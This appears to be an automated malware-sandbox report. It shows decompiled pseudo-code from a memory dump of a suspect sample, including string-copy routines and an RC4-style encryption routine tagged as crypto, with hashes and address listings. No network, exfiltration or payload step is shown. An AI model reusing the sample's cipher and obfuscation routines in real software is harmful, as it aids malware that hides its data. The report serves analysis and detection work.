													asm("pmovmskb ecx, xmm1");
													if(_t128 != 0) {
														break;
													}
													_t172 = _t172 + 8;
													if(_t172 < _t108) {
														continue;
													} else {
														if(_t108 >= 0x7fffffff) {
															goto L35;
														} else {
															goto L33;
														}
													}
													goto L36;
												}
												asm("bsf ebx, ecx");
												_t108 = (_t108 >> 1) + _t172;
											} else {
												_t108 = 0;
												if((_t172 & 0x00000001) != 0) {
													L33:
													while(( *(_t153 + _t108 * 2) & 0x0000ffff) != 0) {
														_t108 = _t108 + 1;
														if(_t108 < 0x7fffffff) {
															continue;
														} else {
															L35:
															_t108 = 0x7fffffff;
														}
														goto L36;
													}
												} else {
													_t172 =  ~_t172 + 0x10 >> 1;
													while(1) {
														_t128 =  *(_t153 + _t108 * 2) & 0x0000ffff;
														if(_t128 == 0) {
															goto L36;
														}
														_t108 = _t108 + 1;
														if(_t108 < _t172) {
															continue;
														} else {
															goto L29;
														}
														goto L36;
													}
												}
											}
											L36:
											_t18 = _t108 + 1; // 0x80000000
											_t86 =  <=  ? 0x40 : _t18;
											if(_t86 > 0) {
												_t177 = (_t86 >> 5 >> 0x1a) + _t86 >> 6;
												_t87 = _t86 & 0x8000003f;
												if(_t87 < 0) {
													_t87 = (_t87 - 0x00000001 | 0xffffffc0) + 1;
												}
												_t178 = _t177 + (0 | _t87 > 0x00000000);
												_v32 = _t178 << 6;
												_push(_t178 << 7);
												_v24 = _t153;
												_t88 = E003B1030();
												_t154 = _v24;
												_t190 = _t190 + 4;
												_t180 =  *_t158;
												if(_t180 == 0) {
													 *_t88 = 0;
												} else {
													if(_t88 != 0) {
														_t138 =  *_t180 & 0x0000ffff;
														 *_t88 = _t138;
														if(_t138 != 0) {
															_v28 = _t158;
															_t139 = 0;
															while(1) {
																_t139 = _t139 + 1;
																_t162 =  *(_t180 + _t139 * 4 - 2) & 0x0000ffff;
																 *(_t88 + _t139 * 4 - 2) = _t162;
																if(_t162 == 0) {
																	break;
																}
																_t163 =  *(_t180 + _t139 * 4) & 0x0000ffff;
																_t88[_t139] = _t163;
																if(_t163 != 0) {
																	continue;
																}
																break;
															}
															_t158 = _v28;
														}
													}
													_push(2);
													_push(_t180);
													_v36 = _t88;
													_v24 = _t154;
													E003B10B0();
													_t154 = _v24;
													_t88 = _v36;
													_t190 = _t190 + 8;
												}
												_t158[1] = _v32;
												 *_t158 = _t88;
											} else {
												_t88 = 0;
											}
											_t181 = _t154;
											if(_t88 != 0 && _t154 != 0) {
												_v28 = _t158;
												_t136 = 0;
												while(1) {
													_t161 =  *_t181 & 0x0000ffff;
													_t136 = _t136 + 1;
													 *_t88 = _t161;
													if(_t108 != 0 && _t136 == _t108) {
														break;
													}
													if(_t161 == 0) {
														_t158 = _v28;
													} else {
														_t88 =  &(_t88[0]);
														_t181 =  &(_t181[1]);
														continue;
													}
													goto L67;
												}
												_t158 = _v28;
												_t88[0] = 0;
											}
										}
									}
									L67:
									_push(2);
									_push(_t154);
									E003B10B0();
									return _t158;
								} else {
									_push(_v36);
									_push(_t153);
									_push(_t100);
									_push(_t165);
									_push(0);
									_push(_a4);
									_v24 = _t153;
									asm("int3");
									return _t78;
								}
							} else {
								_push(0);
								_push(0);
								_push(_t100);
								_push(_t165);
								_push(0);
								_push(_a4);
								asm("int3");
								return _t76;
							}
						} else {
							goto L72;
						}
					}
				}
				L82:
			}

0x003b83c0
0x003b83c9
0x003b83cc
0x003b83ce
0x003b83d2
0x003b8728
0x003b872a
0x003b872f
0x003b8731
0x003b8739
0x003b873b
0x003b873e
0x003b8742
0x003b877e
0x003b8744
0x003b8746
0x003b8748
0x003b874b
0x003b8750
0x003b8752
0x003b8754
0x003b8754
0x003b8755
0x003b875a
0x003b8761
0x00000000
0x00000000
0x003b8763
0x003b8767
0x003b876d
0x00000000
0x00000000
0x00000000
0x003b876d
0x003b8754
0x003b8750
0x003b876f
0x003b876f
0x003b8771
0x003b8772
0x003b8777
0x003b8777
0x003b8781
0x003b878a
0x003b8795
0x003b83d8
0x003b83da
0x003b83dd
0x003b83f5
0x003b83f9
0x003b8405
0x003b840b
0x003b840b
0x003b8410
0x003b8414
0x003b841a
0x00000000
0x00000000
0x003b8420
0x003b8425
0x00000000
0x003b8427
0x003b842d
0x003b8442
0x003b8442
0x00000000
0x003b842f
0x003b842f
0x003b8439
0x003b8440
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8440
0x00000000
0x003b842f
0x003b842d
0x00000000
0x003b8425
0x003b8798
0x003b879b
0x00000000
0x003b83df
0x003b83e1
0x003b83e3
0x003b83e6
0x003b83f0
0x003b83f3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b83f3
0x003b8720
0x003b8722
0x003b8447
0x003b8451
0x003b8458
0x003b846c
0x003b8481
0x003b8486
0x003b8496
0x003b8499
0x003b849f
0x003b84a7
0x003b84a7
0x003b84b7
0x003b84bd
0x003b84bf
0x003b84c4
0x003b8488
0x003b8488
0x003b8488
0x003b84d1
0x003b84d5
0x003b84da
0x003b84e0
0x003b84f9
0x003b84fb
0x003b8500
0x003b8681
0x003b8681
0x003b8686
0x003b868a
0x003b868f
0x003b8693
0x003b8695
0x003b8698
0x003b869c
0x003b86e0
0x003b869e
0x003b86a0
0x003b86a2
0x003b86a5
0x003b86aa
0x003b86ac
0x003b86ae
0x003b86ae
0x003b86af
0x003b86b4
0x003b86bb
0x00000000
0x00000000
0x003b86bd
0x003b86c1
0x003b86c7
0x00000000
0x00000000
0x00000000
0x003b86c7
0x003b86ae
0x003b86aa
0x003b86c9
0x003b86c9
0x003b86cb
0x003b86cc
0x003b86d0
0x003b86d5
0x003b86d9
0x003b86d9
0x003b86e3
0x003b86e5
0x003b8506
0x003b8506
0x003b850b
0x00000000
0x003b8511
0x003b8513
0x003b8516
0x003b8536
0x003b853a
0x003b8546
0x003b854c
0x003b854c
0x003b8551
0x003b8555
0x003b855b
0x00000000
0x00000000
0x003b8561
0x003b8566
0x00000000
0x003b8568
0x003b856e
0x00000000
0x00000000
0x00000000
0x00000000
0x003b856e
0x00000000
0x003b8566
0x003b8714
0x003b8719
0x003b8518
0x003b8518
0x003b8520
0x00000000
0x003b8570
0x003b8578
0x003b857f
0x00000000
0x003b8581
0x003b8581
0x003b8581
0x003b8581
0x00000000
0x003b857f
0x003b8522
0x003b8527
0x003b8529
0x003b8529
0x003b852f
0x00000000
0x00000000
0x003b8531
0x003b8534
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8534
0x003b8529
0x003b8520
0x003b8586
0x003b858b
0x003b8591
0x003b8596
0x003b85a9
0x003b85ac
0x003b85b1
0x003b85b9
0x003b85b9
0x003b85c1
0x003b85cb
0x003b85cf
0x003b85d0
0x003b85d4
0x003b85d9
0x003b85dd
0x003b85e0
0x003b85e4
0x003b8638
0x003b85e6
0x003b85e8
0x003b85ea
0x003b85ed
0x003b85f2
0x003b85f4
0x003b85f8
0x003b85fa
0x003b85fa
0x003b85fb
0x003b8600
0x003b8607
0x00000000
0x00000000
0x003b8609
0x003b860d
0x003b8613
0x00000000
0x00000000
0x00000000
0x003b8613
0x003b8615
0x003b8615
0x003b85f2
0x003b8619
0x003b861b
0x003b861c
0x003b8620
0x003b8624
0x003b8629
0x003b862d
0x003b8631
0x003b8631
0x003b863f
0x003b8642
0x003b8598
0x003b8598
0x003b8598
0x003b8644
0x003b8648
0x003b8656
0x003b865a
0x003b8664
0x003b8664
0x003b8667
0x003b8668
0x003b866d
0x00000000
0x00000000
0x003b8679
0x003b870e
0x003b867f
0x003b865e
0x003b8661
0x00000000
0x003b8661
0x00000000
0x003b8679
0x003b8704
0x003b8708
0x003b8708
0x003b8648
0x003b850b
0x003b86ec
0x003b86ec
0x003b86ee
0x003b86ef
0x003b86ff
0x003b84e2
0x003b84e2
0x003b84e5
0x003b84e6
0x003b84e7
0x003b84e8
0x003b84ea
0x003b84ed
0x003b84f1
0x003b84f2
0x003b84f2
0x003b845a
0x003b845a
0x003b845c
0x003b845e
0x003b845f
0x003b8460
0x003b8462
0x003b8465
0x003b8466
0x003b8466
0x00000000
0x00000000
0x00000000
0x003b8722
0x003b83dd
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction ID: 4e6d12acbe8558336810a8112d1393d95c4e6626d456845467fe4b0dbbc9aa52
Opcode Fuzzy Hash: b8b876869e6e1399d07086898aa747f3fd665ccaa3c4c619e8c8968fd6a9a47e
Instruction Fuzzy Hash: 48B15C7590431286D72A5F29C8917BB73D9EF81358F2A862EEF565BB85EF708C00C291

Uniqueness

Uniqueness Score: -1.00%

Function 003BE3F0, Relevance: .3, Instructions: 317
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003BE3F0(unsigned int* __ecx, intOrPtr* _a4) {
				intOrPtr _v32;
				signed short** _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int* _v60;
				signed int* _v64;
				signed int _t125;
				void* _t129;
				signed int* _t130;
				signed short* _t132;
				unsigned int _t141;
				signed int _t146;
				signed int _t147;
				signed int* _t152;
				signed short* _t153;
				signed int _t156;
				unsigned int _t164;
				signed int _t165;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				unsigned int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t182;
				unsigned int _t184;
				intOrPtr _t185;
				signed int* _t187;
				signed int _t189;
				unsigned int _t195;
				signed int _t196;
				signed int* _t198;
				signed int _t199;
				signed int _t206;
				intOrPtr _t211;
				intOrPtr* _t212;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				intOrPtr* _t222;
				signed short** _t224;
				signed int _t225;
				intOrPtr* _t227;
				signed int _t229;
				signed int _t230;
				unsigned int _t231;
				signed int _t232;
				signed int* _t234;

				_t234 = (_t232 & 0xfffffff0) - 0x34;
				_t222 = __ecx;
				_t227 = _a4;
				if(_t227 == __ecx) {
					L70:
					return _t222;
				}
				_t184 =  *__ecx;
				 *__ecx = 0;
				__ecx[2] = 0;
				_t206 = __ecx[1];
				if(_t184 <= 0) {
					L13:
					_push(4);
					_push(_t206);
					E003B10B0();
					_t234 =  &(_t234[2]);
					_t185 =  *_t227;
					 *(_t222 + 4) = 0;
					if(_t185 == 0) {
						goto L70;
					}
					_t172 = (_t185 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t185 - 0x00000001 & 0xfffffffc;
					_push(0x10 + _t172 * 4);
					 *((intOrPtr*)(_t222 + 8)) = _t172 + 4;
					_t125 = E003B1030();
					_t234 =  &(_t234[1]);
					_t211 =  *_t227;
					 *(_t222 + 4) = _t125;
					 *_t222 = _t211;
					if(_t211 <= 0) {
						goto L70;
					}
					_v32 = _t222;
					_t173 = 0;
					asm("pxor xmm0, xmm0");
					do {
						_push(8);
						_t173 = _t173 + 1;
						_t224 = E003B1030();
						_t234 =  &(_t234[1]);
						if(_t224 == 0) {
							_t224 = 0;
							_t229 = _t173 * 4;
							goto L68;
						}
						_t129 = _t173 - 1;
						if(_t129 < 0 || _t129 >=  *_a4) {
							_t130 = 0;
							_t229 = _t173 * 4;
						} else {
							_t229 = _t173 * 4;
							_t130 =  *( *((intOrPtr*)(_a4 + 4)) + _t229 - 4);
						}
						 *_t224 = 0;
						_t224[1] = 0;
						_t214 =  *_t130;
						if(_t214 == 0 || ( *_t214 & 0x0000ffff) == 0) {
							_push(0x80);
							_t187 = E003B1030();
							_t234 =  &(_t234[1]);
							_t132 =  *_t224;
							if(_t132 == 0) {
								 *_t187 = 0;
								L66:
								 *_t224 = _t187;
								_t224[1] = 0x40;
								goto L68;
							}
							if(_t187 == 0) {
								L64:
								_push(2);
								_push(_t132);
								_v64 = _t187;
								E003B10B0();
								_t187 = _v64;
								_t234 =  &(_t234[2]);
								goto L66;
							}
							_t215 =  *_t132 & 0x0000ffff;
							 *_t187 = _t215;
							if(_t215 == 0) {
								goto L64;
							}
							_v44 = _t173;
							_t216 = 0;
							while(1) {
								_t216 = _t216 + 1;
								_t174 =  *(_t132 + _t216 * 4 - 2) & 0x0000ffff;
								 *(_t187 + _t216 * 4 - 2) = _t174;
								if(_t174 == 0) {
									break;
								}
								_t175 =  *(_t132 + _t216 * 4) & 0x0000ffff;
								_t187[_t216] = _t175;
								if(_t175 != 0) {
									continue;
								}
								break;
							}
							_t173 = _v44;
							goto L64;
						} else {
							_t189 = _t214 & 0x0000000f;
							if(_t189 == 0) {
								L29:
								asm("pxor xmm1, xmm1");
								_t141 =  ~( ~_t189 + 0x00000007 & 0x00000007) + 0x7fffffff;
								_v40 = _t141;
								_v44 = _t173;
								_t176 = _t141;
								while(1) {
									asm("movdqu xmm0, [edx+ecx*2]");
									asm("pcmpeqw xmm0, xmm1");
									asm("pmovmskb eax, xmm0");
									if(_t141 != 0) {
										break;
									}
									_t189 = _t189 + 8;
									if(_t189 < _t176) {
										continue;
									}
									_v40 = _t176;
									_t173 = _v44;
									if(_v40 >= 0x7fffffff) {
										L36:
										_v40 = 0x7fffffff;
										L37:
										_t146 =  <=  ? 0x40 : _v40 + 1;
										if(_t146 > 0) {
											_t195 = (_t146 >> 5 >> 0x1a) + _t146 >> 6;
											_t147 = _t146 & 0x8000003f;
											if(_t147 < 0) {
												_t147 = (_t147 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t196 = _t195 + (0 | _t147 > 0x00000000);
											_v52 = _t196 << 6;
											_push(_t196 << 7);
											_v56 = _t214;
											_t152 = E003B1030();
											_t214 = _v56;
											_t198 = _t152;
											_t234 =  &(_t234[1]);
											_t153 =  *_t224;
											if(_t153 == 0) {
												 *_t198 = 0;
												goto L50;
											} else {
												if(_t198 == 0) {
													L48:
													_push(2);
													_push(_t153);
													_v60 = _t198;
													_v56 = _t214;
													E003B10B0();
													_t214 = _v56;
													_t198 = _v60;
													_t234 =  &(_t234[2]);
													L50:
													_t224[1] = _v52;
													 *_t224 = _t198;
													L51:
													if(_t198 == 0) {
														goto L68;
													}
													_v36 = _t224;
													_t156 = 0;
													_v44 = _t173;
													_t225 = _v40;
													while(1) {
														_t156 = _t156 + 1;
														_t177 =  *(_t214 + _t156 * 2 - 2) & 0x0000ffff;
														 *(_t198 + _t156 * 2 - 2) = _t177;
														if(_t225 != 0 && _t156 == _t225) {
															break;
														}
														if(_t177 != 0) {
															continue;
														}
														_t224 = _v36;
														_t173 = _v44;
														goto L68;
													}
													_t224 = _v36;
													_t173 = _v44;
													 *((short*)(_t198 + _t156 * 2)) = 0;
													goto L68;
												}
												_v48 = _t229;
												_t230 =  *_t153 & 0x0000ffff;
												 *_t198 = _t230;
												_t229 = _v48;
												if(_t230 == 0) {
													goto L48;
												}
												 *_t234 = 0;
												_v56 = _t214;
												_v44 = _t173;
												_t218 =  *_t234;
												while(1) {
													_t218 = _t218 + 1;
													_t178 =  *(_t153 + _t218 * 4 - 2) & 0x0000ffff;
													 *(_t198 + _t218 * 4 - 2) = _t178;
													if(_t178 == 0) {
														break;
													}
													_t179 =  *(_t153 + _t218 * 4) & 0x0000ffff;
													_t198[_t218] = _t179;
													if(_t179 != 0) {
														continue;
													}
													break;
												}
												_t214 = _v56;
												_t173 = _v44;
												goto L48;
											}
										}
										_t198 = 0;
										goto L51;
									}
									L33:
									_t199 = _v40;
									while(( *(_t214 + _t199 * 2) & 0x0000ffff) != 0) {
										_t199 = _t199 + 1;
										if(_t199 < 0x7fffffff) {
											continue;
										}
										goto L36;
									}
									_v40 = _t199;
									goto L37;
								}
								asm("bsf eax, eax");
								_t173 = _v44;
								_v40 = (_t141 >> 1) + _t189;
								goto L37;
							}
							_v40 = 0;
							if((_t189 & 0x00000001) != 0) {
								goto L33;
							}
							_v44 = _t173;
							_t189 =  ~_t189 + 0x10 >> 1;
							_t180 = _v40;
							while(( *(_t214 + _t180 * 2) & 0x0000ffff) != 0) {
								_t180 = _t180 + 1;
								if(_t180 < _t189) {
									continue;
								}
								_t173 = _v44;
								goto L29;
							}
							_v40 = _t180;
							_t173 = _v44;
							goto L37;
						}
						L68:
						_t212 = _v32;
						 *(_t229 +  *((intOrPtr*)(_t212 + 4)) - 4) = _t224;
					} while (_t173 <  *_t212);
					_t222 = _t212;
					goto L70;
				}
				_t164 = _t184 >> 1;
				if(_t164 == 0) {
					_t165 = 1;
					goto L10;
				} else {
					 *_t234 = _t184;
					_t182 = 0;
					_t231 = _t164;
					do {
						_t203 =  *((intOrPtr*)(_t206 + _t182 * 8));
						if( *((intOrPtr*)(_t206 + _t182 * 8)) != 0) {
							_push(1);
							E003B87E0(_t203);
							_t206 =  *(_t222 + 4);
						}
						_t204 =  *((intOrPtr*)(_t206 + 4 + _t182 * 8));
						if( *((intOrPtr*)(_t206 + 4 + _t182 * 8)) != 0) {
							_push(1);
							E003B87E0(_t204);
							_t206 =  *(_t222 + 4);
						}
						_t182 = _t182 + 1;
					} while (_t182 < _t231);
					_t184 =  *_t234;
					_t12 = _t182 + 1; // 0x2
					_t165 = _t182 + _t12;
					_t227 = _a4;
					L10:
					_t14 = _t165 - 1; // 0x1
					if(_t14 < _t184) {
						_t202 =  *((intOrPtr*)(_t206 + _t165 * 4 - 4));
						if( *((intOrPtr*)(_t206 + _t165 * 4 - 4)) != 0) {
							_push(1);
							E003B87E0(_t202);
							_t206 =  *(_t222 + 4);
						}
					}
					goto L13;
				}
			}

0x003be3f9
0x003be3fc
0x003be3fe
0x003be403
0x003be773
0x003be77e
0x003be77e
0x003be40b
0x003be40d
0x003be40f
0x003be412
0x003be417
0x003be475
0x003be475
0x003be477
0x003be478
0x003be47d
0x003be480
0x003be482
0x003be48b
0x00000000
0x00000000
0x003be49d
0x003be4a7
0x003be4ab
0x003be4ae
0x003be4b3
0x003be4b6
0x003be4b8
0x003be4bb
0x003be4bf
0x00000000
0x00000000
0x003be4c5
0x003be4c9
0x003be4cb
0x003be4cf
0x003be4cf
0x003be4d1
0x003be4d7
0x003be4d9
0x003be4de
0x003be755
0x003be757
0x00000000
0x003be757
0x003be4e6
0x003be4e7
0x003be4f0
0x003be4f2
0x003be4fb
0x003be4fe
0x003be508
0x003be508
0x003be50e
0x003be510
0x003be513
0x003be517
0x003be6e8
0x003be6f2
0x003be6f4
0x003be6f7
0x003be6fb
0x003be747
0x003be74a
0x003be74a
0x003be74c
0x00000000
0x003be74c
0x003be6ff
0x003be730
0x003be730
0x003be732
0x003be733
0x003be737
0x003be73c
0x003be740
0x00000000
0x003be740
0x003be701
0x003be704
0x003be709
0x00000000
0x00000000
0x003be70b
0x003be70f
0x003be711
0x003be711
0x003be712
0x003be717
0x003be71e
0x00000000
0x00000000
0x003be720
0x003be724
0x003be72a
0x00000000
0x00000000
0x00000000
0x003be72a
0x003be72c
0x00000000
0x003be528
0x003be52a
0x003be52d
0x003be560
0x003be564
0x003be570
0x003be575
0x003be579
0x003be57d
0x003be57f
0x003be57f
0x003be584
0x003be588
0x003be58e
0x00000000
0x00000000
0x003be594
0x003be599
0x00000000
0x00000000
0x003be59b
0x003be59f
0x003be5ab
0x003be5c6
0x003be5c6
0x003be5ce
0x003be5dd
0x003be5e2
0x003be5f5
0x003be5f8
0x003be5fd
0x003be605
0x003be605
0x003be610
0x003be61a
0x003be61e
0x003be61f
0x003be623
0x003be628
0x003be62c
0x003be62e
0x003be631
0x003be635
0x003be6a1
0x00000000
0x003be637
0x003be639
0x003be682
0x003be682
0x003be684
0x003be685
0x003be689
0x003be68d
0x003be692
0x003be696
0x003be69a
0x003be6a4
0x003be6a8
0x003be6ab
0x003be6ad
0x003be6af
0x00000000
0x00000000
0x003be6b5
0x003be6b9
0x003be6bb
0x003be6bf
0x003be6c3
0x003be6c3
0x003be6c4
0x003be6c9
0x003be6d0
0x00000000
0x00000000
0x003be6dc
0x00000000
0x00000000
0x003be6de
0x003be6e2
0x00000000
0x003be6e2
0x003be790
0x003be794
0x003be798
0x00000000
0x003be798
0x003be63b
0x003be63f
0x003be642
0x003be647
0x003be64b
0x00000000
0x00000000
0x003be64d
0x003be654
0x003be658
0x003be65c
0x003be65f
0x003be65f
0x003be660
0x003be665
0x003be66c
0x00000000
0x00000000
0x003be66e
0x003be672
0x003be678
0x00000000
0x00000000
0x00000000
0x003be678
0x003be67a
0x003be67e
0x00000000
0x003be67e
0x003be635
0x003be5e4
0x00000000
0x003be5e4
0x003be5ad
0x003be5ad
0x003be5b1
0x003be5bd
0x003be5c4
0x00000000
0x00000000
0x00000000
0x003be5c4
0x003be79e
0x00000000
0x003be79e
0x003be7a7
0x003be7ae
0x003be7b2
0x00000000
0x003be7b2
0x003be52f
0x003be53a
0x00000000
0x00000000
0x003be541
0x003be545
0x003be547
0x003be54b
0x003be557
0x003be55a
0x00000000
0x00000000
0x003be55c
0x00000000
0x003be55c
0x003be781
0x003be785
0x00000000
0x003be785
0x003be75e
0x003be75e
0x003be765
0x003be769
0x003be771
0x00000000
0x003be771
0x003be41b
0x003be41d
0x003be7bb
0x00000000
0x003be423
0x003be423
0x003be426
0x003be428
0x003be42a
0x003be42a
0x003be42f
0x003be431
0x003be433
0x003be438
0x003be438
0x003be43b
0x003be441
0x003be443
0x003be445
0x003be44a
0x003be44a
0x003be44d
0x003be44e
0x003be452
0x003be455
0x003be455
0x003be459
0x003be45c
0x003be45c
0x003be461
0x003be463
0x003be469
0x003be46b
0x003be46d
0x003be472
0x003be472
0x003be469
0x00000000
0x003be461

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction ID: 6e85ec9d57d93a4eb50b807da351922e572e1a46005880ba5e25b95f905f6abb
Opcode Fuzzy Hash: 57480cebb6c073643066db0bb37664f53f528b12d2ca4e8ceeab76096e5db0d9
Instruction Fuzzy Hash: 84C1E1B46043028BD715CF2DC4917EAB7E1FF98308F14862DEAA58BB51EB30D955CB81

Uniqueness

Uniqueness Score: -1.00%

Function 003CD180, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003CD180(signed int __ecx, signed int __edx) {
				void* _t169;
				void* _t178;
				void* _t184;
				signed int _t195;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t208;
				signed int _t210;
				signed char _t212;
				signed int _t214;
				void* _t216;
				signed int _t241;
				signed int _t250;
				signed int _t254;
				signed int _t260;
				signed int _t261;
				signed char _t263;
				signed int _t264;
				signed int _t265;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed char _t279;
				signed int _t281;
				signed int _t282;
				signed char _t284;
				signed int _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t295;
				signed int _t304;
				void* _t305;
				void* _t306;
				signed int _t307;
				signed int _t309;
				signed int _t312;
				signed int _t314;
				signed int _t316;
				signed int* _t323;
				void* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t330;
				signed int* _t333;

				_t333[0x8f] = __edx;
				_t291 = __ecx;
				_push(0);
				_t216 =  ==  ? __edx : _t333[0x97];
				E003C9350(__ecx);
				E003CA1A0( &(_t333[4]), 0x10, 0);
				_t169 = E003C9640( &(_t333[4]), 0);
				E003C9710(__ecx, _t169, E003C9650( &(_t333[3])));
				_t333[0x87] = E003B0B60(_t216);
				_t305 = E003C9640( &(_t333[4]), 0);
				if(_t305 != 0) {
					if(E003CD620(_t305, 0x10) == 0xd2490422) {
						_t330 = 0;
					} else {
						_t330 =  ==  ? 0 : 1;
					}
					 *_t333 = 0;
					_t203 =  *_t333;
					do {
						 *(_t333 + _t203 + 0x1c) = _t203;
						 *((char*)(_t333 + _t203 + 0x11c)) =  *((_t203 & 0x0000000f) + _t305) & 0x000000ff;
						_t203 = _t203 + 1;
					} while (_t203 < 0x100);
					_t250 = 0;
					_t333[2] = _t291;
					_t309 = 0;
					do {
						_t204 =  *(_t333 + 0x1c + _t309 * 2) & 0x000000ff;
						_t304 = ( *(_t333 + 0x11c + _t309 * 2) & 0x000000ff) + _t204 + _t250 & 0x000000ff;
						 *(_t333 + 0x1c + _t309 * 2) =  *(_t333 + _t304 + 0x1c) & 0x000000ff;
						 *(_t333 + _t304 + 0x1c) = _t204;
						_t205 =  *(_t333 + 0x1d + _t309 * 2) & 0x000000ff;
						_t250 = ( *(_t333 + 0x11d + _t309 * 2) & 0x000000ff) + _t205 + _t304 & 0x000000ff;
						 *(_t333 + 0x1d + _t309 * 2) =  *(_t333 + _t250 + 0x1c) & 0x000000ff;
						_t309 = _t309 + 1;
						 *(_t333 + _t250 + 0x1c) = _t205;
					} while (_t309 < 0x80);
					_t273 = _t333[7] & 0x000000ff;
					 *_t333 = _t273;
					_t291 = _t333[2];
					_t333[7] =  *(_t333 + _t273 + 0x1c) & 0x000000ff;
					_t275 =  *_t333;
					 *(_t333 + _t275 + 0x1c) = _t275;
					_t312 = (_t333[7] & 0x000000ff) + _t275 & 0x000000ff;
					_t276 = _t333[0x87] & 0x000000ff;
					if(_t330 != 0) {
						_t276 = _t276 ^  *(_t333 + _t312 + 0x1c) & 0x000000ff;
					}
					_t333[0x87] = _t276;
					_t277 = _t333[7] & 0x000000ff;
					_t208 =  *_t333 + _t277 & 0x000000ff;
					_t333[1] = _t277;
					_t333[7] =  *(_t333 + _t208 + 0x1c) & 0x000000ff;
					_t279 = _t333[1];
					 *(_t333 + _t208 + 0x1c) = _t279;
					_t314 = _t279 + (_t333[7] & 0x000000ff) & 0x000000ff;
					_t281 = _t333[0x87] & 0x000000ff;
					if(_t330 != 0) {
						_t281 = _t281 ^  *(_t333 + _t314 + 0x1c) & 0x000000ff;
					}
					_t333[0x87] = _t281;
					_t282 = _t333[7] & 0x000000ff;
					_t210 = _t208 + _t282 & 0x000000ff;
					 *_t333 = _t282;
					_t333[7] =  *(_t333 + _t210 + 0x1c) & 0x000000ff;
					_t284 =  *_t333;
					 *(_t333 + _t210 + 0x1c) = _t284;
					_t316 = _t284 + (_t333[7] & 0x000000ff) & 0x000000ff;
					_t286 = _t333[0x87] & 0x000000ff;
					if(_t330 != 0) {
						_t286 = _t286 ^  *(_t333 + _t316 + 0x1c) & 0x000000ff;
					}
					_t333[0x87] = _t286;
					_t287 = _t333[8] & 0x000000ff;
					_t254 = _t210 + _t287 & 0x000000ff;
					_t212 = _t287;
					_t333[8] =  *(_t333 + _t254 + 0x1c) & 0x000000ff;
					 *(_t333 + _t254 + 0x1c) = _t212;
					_t214 = _t212 + (_t333[8] & 0x000000ff) & 0x000000ff;
					_t289 = _t333[0x87] & 0x000000ff;
					if(_t330 != 0) {
						_t289 = _t289 ^  *(_t333 + _t214 + 0x1c) & 0x000000ff;
					}
					_t333[0x87] = _t289;
				}
				_t333[0x90] = _t333[0x87];
				E003C9710(_t291,  &(_t333[0x90]), 4);
				_t323 =  &(_t333[7]);
				E003CA1A0(_t323, 0x10, 0);
				_push(_t323);
				E003C9520( &(_t333[4]));
				E003C9510(_t323);
				_t178 = E003C9640( &(_t333[4]), 0);
				E003C9710(_t291, _t178, E003C9650( &(_t333[3])));
				_push(_t216);
				E003C9350( &(_t333[0xc]));
				_t325 = E003C9640( &(_t333[4]), 0);
				_t333[1] = E003C9640( &(_t333[0xc]), 0);
				if(_t325 != 0 && _t333[0x8f] != 0 && _t216 != 0 && _t333[1] != 0) {
					if(E003CD620(_t325, 0x10) == 0xd2490422) {
						_t306 = 0;
					} else {
						_t306 =  ==  ? 0 : 1;
					}
					 *_t333 = 0;
					_t260 =  *_t333;
					do {
						 *(_t333 + _t260 + 0x13c) = _t260;
						 *((char*)(_t333 + _t260 + 0x3c)) =  *((_t260 & 0x0000000f) + _t325) & 0x000000ff;
						_t260 = _t260 + 1;
					} while (_t260 < 0x100);
					_t241 = 0;
					_t333[2] = _t291;
					_t326 = 0;
					do {
						_t261 =  *(_t333 + 0x13c + _t326 * 2) & 0x000000ff;
						_t295 = ( *(_t333 + 0x3c + _t326 * 2) & 0x000000ff) + _t261 + _t241 & 0x000000ff;
						 *(_t333 + 0x13c + _t326 * 2) =  *(_t333 + _t295 + 0x13c) & 0x000000ff;
						 *(_t333 + _t295 + 0x13c) = _t261;
						_t195 =  *(_t333 + 0x13d + _t326 * 2) & 0x000000ff;
						_t241 = ( *(_t333 + 0x3d + _t326 * 2) & 0x000000ff) + _t195 + _t295 & 0x000000ff;
						 *(_t333 + 0x13d + _t326 * 2) =  *(_t333 + _t241 + 0x13c) & 0x000000ff;
						_t326 = _t326 + 1;
						 *(_t333 + _t241 + 0x13c) = _t195;
					} while (_t326 < 0x80);
					_t291 = _t333[2];
					if(_t216 > 0) {
						_t327 = 0;
						_t263 = 1;
						_t307 = 0;
						if(_t306 != 0) {
							_t333[2] = _t291;
							asm("o16 nop [eax+eax]");
							do {
								_t264 = _t263 & 0x000000ff;
								_t196 =  *(_t333 + _t264 + 0x13c) & 0x000000ff;
								_t327 = _t327 + _t196 & 0x000000ff;
								 *(_t333 + _t264 + 0x13c) =  *(_t333 + _t327 + 0x13c) & 0x000000ff;
								 *(_t333 + _t327 + 0x13c) = _t196;
								_t263 = _t264 + 1;
								 *((char*)(_t307 + _t333[1])) =  *(_t307 + _t333[0x8f]) & 0x000000ff ^  *(_t333 + (_t196 + ( *(_t333 + _t264 + 0x13c) & 0x000000ff) & 0x000000ff) + 0x13c) & 0x000000ff;
								_t307 = _t307 + 1;
							} while (_t307 < _t216);
